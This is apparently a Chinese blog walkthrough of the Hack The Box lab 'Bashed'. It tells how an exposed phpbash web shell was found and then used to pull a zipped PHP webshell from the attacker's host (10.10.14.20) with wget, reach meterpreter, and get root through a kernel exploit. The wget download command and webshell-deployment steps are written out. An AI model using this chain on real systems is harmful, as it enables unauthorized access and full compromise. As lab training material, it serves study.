【HTB】Bashed(可执行命令漏洞,内核提权)

信息收集

image.png

开了80端口,浏览器打开看看


image.png

一个叫phpbash的软件,网站找了一圈好像没有啥可以利用的东西。
目录爆破看看:


image.png

打开dev目录,发现两个文件
image.png

打开phpbash.php,发现是一个shell
image.png

攻击

因为可以执行任意shell,那就可以上传任意文件通过msf拿到meterpreter,生成一个木马,在本地开一个http服务,通过wget的方式从目标机器拉取本地的后门文件。
需要注意的是,不能直接拉取本地的php文件,必须在本地打包以后再拉取,我在这里就傻了,搞了半天。。。
另外,dev目录是没有写权限的,需要在uploads文件夹操作
最近知道msf里有一个中国菜刀的模块,于是决定用一下。
写一句话木马:


image.png

执行打包:

zip caidao.zip caidao.php

本地开启apache:

service apache2 start

在网页shell拉取

wget -P /var/www/html/uploads  http://10.10.14.20/caidao.zip

解压:

unzip /var/www/html/uploads/caidao.zip -d /var/www/html/uploads/caidao
image.png

拿到meterpreter:


image.png

提权

查看系统版本

image.png

根据内核版本找了一圈,最后在这篇文章提到的方法里找到了一个提权脚本。
编译,上传,执行
image.png

拿到root权限和flag

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容